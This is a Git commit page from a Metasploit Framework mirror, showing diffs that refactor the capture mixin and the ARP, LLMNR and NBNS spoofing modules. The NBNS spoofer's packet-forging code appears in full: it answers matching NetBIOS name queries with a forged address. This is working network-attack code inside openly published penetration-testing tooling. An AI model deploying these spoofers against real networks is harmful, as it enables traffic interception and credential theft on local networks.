infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #4827, capture and nbns fixups

bug/bundler_fix sprint-G05
James Lee 2015-03-17 17:37:55 -05:00
parent 47a7f99aae d7fa0ec669
commit bd4738b93e
No known key found for this signature in database
GPG Key ID: 2D6094C7CEA0A321
5 changed files with 190 additions and 163 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

103
lib/msf/core/exploit/capture.rb
View File

@ -42,7 +42,7 @@ module Msf
[ [
true, true,
'Send a TTL=1 random UDP datagram to this host to discover the default gateway\'s MAC', 'Send a TTL=1 random UDP datagram to this host to discover the default gateway\'s MAC',
'www.metasploit.com']), '8.8.8.8']),
OptPort.new('GATEWAY_PROBE_PORT', OptPort.new('GATEWAY_PROBE_PORT',
[ [
false, false,
@ -143,7 +143,6 @@ module Msf
return unless self.capture return unless self.capture
self.capture = nil self.capture = nil
self.arp_capture = nil self.arp_capture = nil
GC.start()
end end
def capture_extract_ies(raw) def capture_extract_ies(raw)
@ -163,26 +162,15 @@ module Msf
end end
# #
# This monstrosity works around a series of bugs in the interrupt # Loop through each packet
# signal handling of Ruby 1.9
# #
def each_packet def each_packet
return unless capture return unless capture
begin @capture_count ||= 0
@capture_count = 0 capture.each do |pkt|
reader = framework.threads.spawn("PcapReceiver", false) do yield(pkt)
capture.each do |pkt| @capture_count += 1
yield(pkt)
@capture_count += 1
end
end
reader.join
rescue ::Exception
raise $!
ensure
reader.kill if reader.alive?
end end
@capture_count @capture_count
end end
@ -242,10 +230,9 @@ module Msf
pcap.inject(pkt) pcap.inject(pkt)
Rex.sleep((delay * 1.0)/1000) Rex.sleep((delay * 1.0)/1000)
end end
GC.start
end end
# Capture_sendto is intended to replace the old Rex::Socket::Ip.sendto method. It requires # capture_sendto is intended to replace the old Rex::Socket::Ip.sendto method. It requires
# a payload and a destination address. To send to the broadcast address, set bcast # a payload and a destination address. To send to the broadcast address, set bcast
# to true (this will guarantee that packets will be sent even if ARP doesn't work # to true (this will guarantee that packets will be sent even if ARP doesn't work
# out). # out).
@ -262,24 +249,20 @@ module Msf
# The return value either be a PacketFu::Packet object, or nil # The return value either be a PacketFu::Packet object, or nil
def inject_reply(proto=:udp, pcap=self.capture) def inject_reply(proto=:udp, pcap=self.capture)
reply = nil # Defaults to ~2 seconds
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 to = (datastore['TIMEOUT'] * 4) / 1000.0
if not pcap raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)" if not pcap
raise RuntimeError, "Could not access the capture process (remember to open_pcap first!)" begin
else ::Timeout.timeout(to) do
begin pcap.each do |r|
::Timeout.timeout(to) do packet = PacketFu::Packet.parse(r)
pcap.each do |r| next unless packet.proto.map { |x| x.downcase.to_sym }.include? proto
packet = PacketFu::Packet.parse(r) return packet
next unless packet.proto.map { |x| x.downcase.to_sym }.include? proto
reply = packet
break
end
end end
rescue ::Timeout::Error
end end
rescue ::Timeout::Error
end end
return reply nil
end end
# This ascertains the correct Ethernet addresses one should use to # This ascertains the correct Ethernet addresses one should use to
@ -328,20 +311,19 @@ module Msf
end end
begin begin
to = (datastore['TIMEOUT'] || 1500).to_f / 1000.0 to = ((datastore['TIMEOUT'] || 500).to_f * 8) / 1000.0
::Timeout.timeout(to) do ::Timeout.timeout(to) do
while (my_packet = inject_reply(:udp, self.arp_capture)) loop do
if my_packet.payload == secret my_packet = inject_reply(:udp, self.arp_capture)
dst_mac = self.arp_cache[:gateway] = my_packet.eth_daddr next unless my_packet
src_mac = self.arp_cache[Rex::Socket.source_address(addr)] = my_packet.eth_saddr next unless my_packet.payload == secret
return [dst_mac, src_mac] dst_mac = self.arp_cache[:gateway] = my_packet.eth_daddr
else src_mac = self.arp_cache[Rex::Socket.source_address(addr)] = my_packet.eth_saddr
next return [dst_mac, src_mac]
end
end end
end end
rescue ::Timeout::Error rescue ::Timeout::Error
# Well, that didn't work (this common on networks where there's no gatway, like # Well, that didn't work (this is common on networks where there's no gateway, like
# VMWare network interfaces. We'll need to use a fake source hardware address. # VMWare network interfaces. We'll need to use a fake source hardware address.
self.arp_cache[Rex::Socket.source_address(addr)] = "00:00:00:00:00:00" self.arp_cache[Rex::Socket.source_address(addr)] = "00:00:00:00:00:00"
end end
@ -354,26 +336,31 @@ module Msf
return self.arp_cache[:gateway] unless should_arp? target_ip return self.arp_cache[:gateway] unless should_arp? target_ip
source_ip = Rex::Socket.source_address(target_ip) source_ip = Rex::Socket.source_address(target_ip)
raise RuntimeError, "Could not access the capture process." unless self.arp_capture raise RuntimeError, "Could not access the capture process." unless self.arp_capture
p = arp_packet(target_ip, source_ip) p = arp_packet(target_ip, source_ip)
inject_eth(:eth_type => 0x0806,
:payload => p, # Try up to 3 times to get an ARP response
:pcap => self.arp_capture, 1.upto(3) do
:eth_saddr => self.arp_cache[Rex::Socket.source_address(target_ip)] inject_eth(:eth_type => 0x0806,
) :payload => p,
begin :pcap => self.arp_capture,
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 :eth_saddr => self.arp_cache[Rex::Socket.source_address(target_ip)]
::Timeout.timeout(to) do )
while (my_packet = inject_reply(:arp, self.arp_capture)) begin
if my_packet.arp_saddr_ip == target_ip to = ((datastore['TIMEOUT'] || 500).to_f * 8) / 1000.0
::Timeout.timeout(to) do
loop do
my_packet = inject_reply(:arp, self.arp_capture)
next unless my_packet
next unless my_packet.arp_saddr_ip == target_ip
self.arp_cache[target_ip] = my_packet.eth_saddr self.arp_cache[target_ip] = my_packet.eth_saddr
return self.arp_cache[target_ip] return self.arp_cache[target_ip]
else
next
end end
end end
rescue ::Timeout::Error
end end
rescue ::Timeout::Error
end end
nil
end end
# Creates a full ARP packet, mainly for use with inject_eth() # Creates a full ARP packet, mainly for use with inject_eth()

1
lib/msf/core/exploit/ipv6.rb
View File

@ -76,7 +76,6 @@ module Exploit::Remote::Ipv6
return if not @ipv6_icmp6_capture return if not @ipv6_icmp6_capture
@ipv6_icmp6_capture = nil @ipv6_icmp6_capture = nil
GC.start()
end end
# #

1
modules/auxiliary/spoof/arp/arp_poisoning.rb
View File

@ -103,7 +103,6 @@ class Metasploit3 < Msf::Auxiliary
if datastore['LISTENER'] if datastore['LISTENER']
@listener.kill if @listener @listener.kill if @listener
GC.start()
end end
if capture and @spoofing and not datastore['BROADCAST'] if capture and @spoofing and not datastore['BROADCAST']

29
modules/auxiliary/spoof/llmnr/llmnr_response.rb
View File

@ -139,9 +139,7 @@ attr_accessor :sock, :thread
end end
ip_pkt.recalc ip_pkt.recalc
open_pcap capture_sendto(ip_pkt, rhost.to_s, true)
capture_sendto(ip_pkt, rhost.to_s, true)
close_pcap
end end
def monitor_socket def monitor_socket
@ -176,7 +174,10 @@ attr_accessor :sock, :thread
def run def run
check_pcaprub_loaded() check_pcaprub_loaded()
::Socket.do_not_reverse_lookup = true ::Socket.do_not_reverse_lookup = true # Mac OS X workaround
# Avoid receiving extraneous traffic on our send socket
open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})
# Multicast Address for LLMNR # Multicast Address for LLMNR
multicast_addr = ::IPAddr.new("224.0.0.252") multicast_addr = ::IPAddr.new("224.0.0.252")
@ -191,24 +192,28 @@ attr_accessor :sock, :thread
self.sock = Rex::Socket.create_udp( self.sock = Rex::Socket.create_udp(
# This must be INADDR_ANY to receive multicast packets # This must be INADDR_ANY to receive multicast packets
'LocalHost' => "0.0.0.0", 'LocalHost' => "0.0.0.0",
'LocalPort' => 5355) 'LocalPort' => 5355,
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
)
self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1) self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
self.sock.setsockopt(::Socket::IPPROTO_IP, ::Socket::IP_ADD_MEMBERSHIP, optval) self.sock.setsockopt(::Socket::IPPROTO_IP, ::Socket::IP_ADD_MEMBERSHIP, optval)
self.thread = Rex::ThreadFactory.spawn("LLMNRServerMonitor", false) { self.thread = Rex::ThreadFactory.spawn("LLMNRServerMonitor", false) {
monitor_socket monitor_socket
} }
print_status("LLMNR Spoofer started. Listening for LLMNR requests with REGEX \"#{datastore['REGEX']}\" ...") print_status("LLMNR Spoofer started. Listening for LLMNR requests with REGEX \"#{datastore['REGEX']}\" ...")
add_socket(self.sock) add_socket(self.sock)
while thread.alive? self.thread.join
select(nil, nil, nil, 0.25)
end
self.thread.kill
self.sock.close rescue nil
end end
def cleanup
if self.thread and self.thread.alive?
self.thread.kill
self.thread = nil
end
close_pcap
end
end end

219
modules/auxiliary/spoof/nbns/nbns_response.rb
View File

@ -9,6 +9,9 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture include Msf::Exploit::Capture
attr_accessor :sock, :thread
def initialize def initialize
super( super(
'Name' => 'NetBIOS Name Service Spoofer', 'Name' => 'NetBIOS Name Service Spoofer',
@ -44,108 +47,142 @@ class Metasploit3 < Msf::Auxiliary
]) ])
register_advanced_options([ register_advanced_options([
OptBool.new('Debug', [ false, "Determines whether incoming packet parsing is displayed", false]) OptBool.new('DEBUG', [ false, "Determines whether incoming packet parsing is displayed", false])
]) ])
deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER') deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER')
self.thread = nil
self.sock = nil
end
def dispatch_request(packet, rhost, src_port)
rhost = ::IPAddr.new(rhost)
# `recvfrom` (on Linux at least) will give us an ipv6/ipv4 mapped
# addr like "::ffff:192.168.0.1" when the interface we're listening
# on has an IPv6 address. Convert it to just the v4 addr
if rhost.ipv4_mapped?
rhost = rhost.native
end
# Convert to string
rhost = rhost.to_s
spoof = ::IPAddr.new(datastore['SPOOFIP'])
return if packet.length == 0
nbnsq_transid = packet[0..1]
nbnsq_flags = packet[2..3]
nbnsq_questions = packet[4..5]
nbnsq_answerrr = packet[6..7]
nbnsq_authorityrr = packet[8..9]
nbnsq_additionalrr = packet[10..11]
nbnsq_name = packet[12..45]
decoded = ""
nbnsq_name.slice(1..-2).each_byte do |c|
decoded << "#{(c - 65).to_s(16)}"
end
nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()
nbnsq_type = packet[46..47]
nbnsq_class = packet[48..49]
return unless nbnsq_decodedname =~ /#{datastore['REGEX']}/i
vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{spoof}")
if datastore['DEBUG']
print_status("transid: #{nbnsq_transid.unpack('H4')}")
print_status("tlags: #{nbnsq_flags.unpack('B16')}")
print_status("questions: #{nbnsq_questions.unpack('n')}")
print_status("answerrr: #{nbnsq_answerrr.unpack('n')}")
print_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}")
print_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}")
print_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
print_status("full name: #{nbnsq_name.slice(1..-2)}")
print_status("decoded: #{decoded}")
print_status("decoded name: #{nbnsq_decodedname}")
print_status("type: #{nbnsq_type.unpack('n')}")
print_status("class: #{nbnsq_class.unpack('n')}")
end
# time to build a response packet - Oh YEAH!
response = nbnsq_transid +
"\x85\x00" + # Flags = response + authoratative + recursion desired +
"\x00\x00" + # Questions = 0
"\x00\x01" + # Answer RRs = 1
"\x00\x00" + # Authority RRs = 0
"\x00\x00" + # Additional RRs = 0
nbnsq_name + # original query name
nbnsq_type + # Type = NB ...whatever that means
nbnsq_class+ # Class = IN
"\x00\x04\x93\xe0" + # TTL = a long ass time
"\x00\x06" + # Datalength = 6
"\x00\x00" + # Flags B-node, unique = whatever that means
spoof.hton
pkt = PacketFu::UDPPacket.new
pkt.ip_saddr = Rex::Socket.source_address(rhost)
pkt.ip_daddr = rhost
pkt.ip_ttl = 255
pkt.udp_sport = 137
pkt.udp_dport = src_port
pkt.payload = response
pkt.recalc
capture_sendto(pkt, rhost)
end
def monitor_socket
while true
rds = [self.sock]
wds = []
eds = [self.sock]
r,_,_ = ::IO.select(rds,wds,eds,0.25)
if (r != nil and r[0] == self.sock)
packet, host, port = self.sock.recvfrom(65535)
dispatch_request(packet, host, port)
end
end
end end
def run def run
check_pcaprub_loaded() # Check first since otherwise this is all for naught check_pcaprub_loaded()
# MacOS X workaround ::Socket.do_not_reverse_lookup = true # Mac OS X workaround
::Socket.do_not_reverse_lookup = true
@sock = ::UDPSocket.new() # Avoid receiving extraneous traffic on our send socket
@sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1) open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})
@sock.bind('', 137) # couldn't specify srv host because it missed broadcasts
@run = true self.sock = Rex::Socket.create_udp(
'LocalHost' => "0.0.0.0",
'LocalPort' => 137,
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
)
add_socket(self.sock)
self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
print_status("NBNS Spoofer started. Listening for NBNS requests...") self.thread = Rex::ThreadFactory.spawn("NBNSServerMonitor", false) {
begin
begin monitor_socket
rescue ::Interrupt
while @run # Not exactly thrilled we can never turn this off XXX fix this sometime. raise $!
packet, addr = @sock.recvfrom(512) rescue ::Exception
src_port = addr[1] print_error("Error: #{$!.class} #{$!} #{$!.backtrace}")
rhost = addr[3]
break if packet.length == 0
nbnsq_transid = packet[0..1]
nbnsq_flags = packet[2..3]
nbnsq_questions = packet[4..5]
nbnsq_answerrr = packet[6..7]
nbnsq_authorityrr = packet[8..9]
nbnsq_additionalrr = packet[10..11]
nbnsq_name = packet[12..45]
decoded = ""
nbnsq_name.slice(1..-2).each_byte do |c|
decoded << "#{(c - 65).to_s(16)}"
end end
nbnsq_decodedname = "#{[decoded].pack('H*')}".strip() }
nbnsq_type = packet[46..47]
nbnsq_class = packet[48..49]
if (nbnsq_decodedname =~ /#{datastore['REGEX']}/i) print_status("NBNS Spoofer started. Listening for NBNS requests with REGEX \"#{datastore['REGEX']}\" ...")
vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{datastore["SPOOFIP"]}") self.thread.join
print_status("NBNS Monitor thread exited...")
if datastore['DEBUG']
print_status("transid: #{nbnsq_transid.unpack('H4')}")
print_status("tlags: #{nbnsq_flags.unpack('B16')}")
print_status("questions: #{nbnsq_questions.unpack('n')}")
print_status("answerrr: #{nbnsq_answerrr.unpack('n')}")
print_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}")
print_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}")
print_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
print_status("full name: #{nbnsq_name.slice(1..-2)}")
print_status("decoded: #{decoded}")
print_status("decoded name: #{nbnsq_decodedname}")
print_status("type: #{nbnsq_type.unpack('n')}")
print_status("class: #{nbnsq_class.unpack('n')}")
end
# time to build a response packet - Oh YEAH!
response = nbnsq_transid +
"\x85\x00" + # Flags = response + authoratative + recursion desired +
"\x00\x00" + # Questions = 0
"\x00\x01" + # Answer RRs = 1
"\x00\x00" + # Authority RRs = 0
"\x00\x00" + # Additional RRs = 0
nbnsq_name + # original query name
nbnsq_type + # Type = NB ...whatever that means
nbnsq_class+ # Class = IN
"\x00\x04\x93\xe0" + # TTL = a long ass time
"\x00\x06" + # Datalength = 6
"\x00\x00" + # Flags B-node, unique = whet ever that means
datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')
open_pcap
p = PacketFu::UDPPacket.new
p.ip_saddr = Rex::Socket.source_address(rhost)
p.ip_daddr = rhost
p.ip_ttl = 255
p.udp_sport = 137
p.udp_dport = src_port
p.payload = response
p.recalc
capture_sendto(p, rhost)
close_pcap
else
vprint_status("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} did not match regex")
end
end
rescue ::Exception => e
print_error("nbnspoof: #{e.class} #{e} #{e.backtrace}")
# Make sure the socket gets closed on exit
ensure
@sock.close
end
end end
def cleanup
if self.thread and self.thread.alive?
self.thread.kill
self.thread = nil
end
close_pcap
end
end end